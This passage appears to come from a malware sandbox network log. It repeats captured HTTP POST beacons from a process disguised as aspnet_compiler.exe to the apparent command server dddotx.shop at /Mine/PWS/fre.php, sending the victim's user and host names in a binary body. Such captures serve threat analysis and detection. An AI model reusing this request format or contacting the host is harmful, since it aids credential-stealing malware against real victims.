                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      35192.168.2.549976188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:01.666158915 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:01.672985077 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:03.971559048 CEST770INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:03 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ky3uBCX0Z19WlgeL7AA8Tw7OtrsrpN%2FCY13aQSYHqIKMRuoDOk4KGIQMP65p0bgVmq5ztY50CKny5YTEoiBpSTk5QRI7gvpnBsQiOVo6sE93BG9fdEGhpEI679oVOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad9eecb3f6b43-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1292&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      36192.168.2.549980188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:04.117002010 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:04.124053955 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:05.022277117 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:04 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wdhL7acaJ6ijpM%2Fz8d%2B1fZ20YOUDVzIFzvJQH71sOKoW3Uk6vy8FTa9RK26A4z8nv0fPEUY1DCibtBVpMnXCyHDWtTtunHTk%2FN7KtmeDDGtmNb7yPDgrlMwrUqRa9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad9fe1d9c2e63-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1537&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      37192.168.2.549983188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:05.163805962 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:05.169369936 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:06.083108902 CEST778INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:06 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5r9M1Kxwmp06Tn%2BSlDd2Owuu0bUHoU8k%2FRiz5ZhtRpRS3JjPHDsUjdqsHu3%2B3E%2BKBIgHJdGzmxVVo7xwd4pPU1uVogjD9T9wa96I97M3URqo7YJ%2FqoIEG5aqHd8ePg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ada04ae798788-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1358&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      38192.168.2.549987188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:06.226603031 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:06.232215881 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:07.269582033 CEST770INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:07 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Hoy8jUtbaNiQogpR7xBYRN4Qxa0WEHg5pB%2Fbg287JQIreEDqJcCElSurkRf0GV3uAseD2m12UdSjD4uWZN43a97I5f1tjz6YVgAxpNsMZVTU7JbisG3dKGWBefZLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ada0b5dd94743-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1120&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=105&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      39192.168.2.549990188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:07.412898064 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:07.418539047 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:08.761451006 CEST772INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:08 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XEeWlldJIgJjnVVY0SO26O0TfTmIXckdTrnihdrTBRhuzX5FS4qGcQrLHtrnWqxzo0rzHSNE3%2F24hFuvhLTQGBuuvuXzp5VQBLrVITaxiFBjYN%2B9fsZdePlJbC6d2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ada12ba766b82-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1161&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      40192.168.2.549995188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:08.914410114 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:08.919859886 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:11.602705002 CEST770INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:11 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FRL0MJ6O1BAFldDScCQCjuc4Np8QFdXGb3rHH6ZGn6EI1HL80Gs5DaDyzC7U2AIQ4EMmyTO%2FIqK92ZxRKrE4ZGRUtAzH4XQq6Vc5xutaG59hKXXjKswA42SkvjP0LQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ada1c19a06c62-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1038&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      41192.168.2.550002188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:11.772185087 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:11.777745008 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:15.147119999 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:15 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KWYQ2w75zgZFo8QaD7WFRpSfrTPXYBuKFIZxHQ5C6gWjGcRe%2FKXfB9LzwVy3hqLZJk8iMsoMUCWYZZhDVRYvHMc7LlKFBh17eYmTvwXK%2B61HMX%2BlbQ8CwXipME7JoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ada2dedc56b39-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1184&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      42192.168.2.550010188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:15.303961992 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:15.310030937 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:16.206479073 CEST778INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:16 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d1%2B1Q%2Fo%2FG2QnAoJlSM0yAKKU6G3R2R5pGONJQGTP%2FyDAo0sqh5tYQl1FFInBNBi7QAjr599mfV9tHRf1Q1QTjRACFrNOTf85kNB5ENQ6cw2N4bDrZqiZ1%2FGzjSKOzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ada44194f35a2-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1242&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      43192.168.2.550013188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:16.347213030 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:16.352682114 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:17.263499022 CEST784INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:17 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QoJF9AMe%2FA%2B%2BSad6%2B3CyNVUbHH0zURWAvWe39GrkE4FOmChe%2FbYIAfXfH7nlf1cIWHiZiVRtoP8EbFR2zcvjEr%2F%2BRDhDqSraZ3%2F33cl7pmmo2sSZsWO37rvzbcxfow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ada4a8fd24868-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1398&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      44192.168.2.550019188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:17.413908958 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:17.420331001 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:18.463715076 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:18 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=74i3Eu8mrHpb3GPYKmVboas8SY9SUF9ej8%2BmMq1nH8G%2F9I6WLwstdvVHF4LGniTh0f2WfWV70WksH5ZOs2eQ%2FjOCgKdbluf3hEasg2worBmZgOkqPPitMHBQlhltMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ada513b2ea927-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1540&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      45192.168.2.550022188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:18.614675999 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:18.620368958 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:19.665740013 CEST776INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:19 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EHkhOwqkAR225TjaaK3%2B5VGRcaldiYXKReieWHLBJGHDB5iu%2BVjX%2FeKTdR4v3fvD68rqTWpBeQJmhv6ACfFHSCvXQ%2B5ENF5abqaEPBDLM6z9K1Ru5e1wanLVRITgQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ada58ccaee857-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      46192.168.2.550023188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:19.824379921 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:19.829824924 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:20.770615101 CEST778INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:20 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WjdKh59KaDKOs3aZ5Gi7oN9PsKZ1g9DB23k5SQBKGa288O5VBEyDksfYOwl5pfk%2BQqH8iv%2BQtkd6ZSj%2BZAD04pM873rGSjdktUen6N%2FvsMaXlwTdySB7FLcRlL%2Fssw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ada60493a6b48-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2601&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      47192.168.2.550024188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:03:20.917121887 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:03:20.922651052 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:03:21.809870958 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:03:21 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
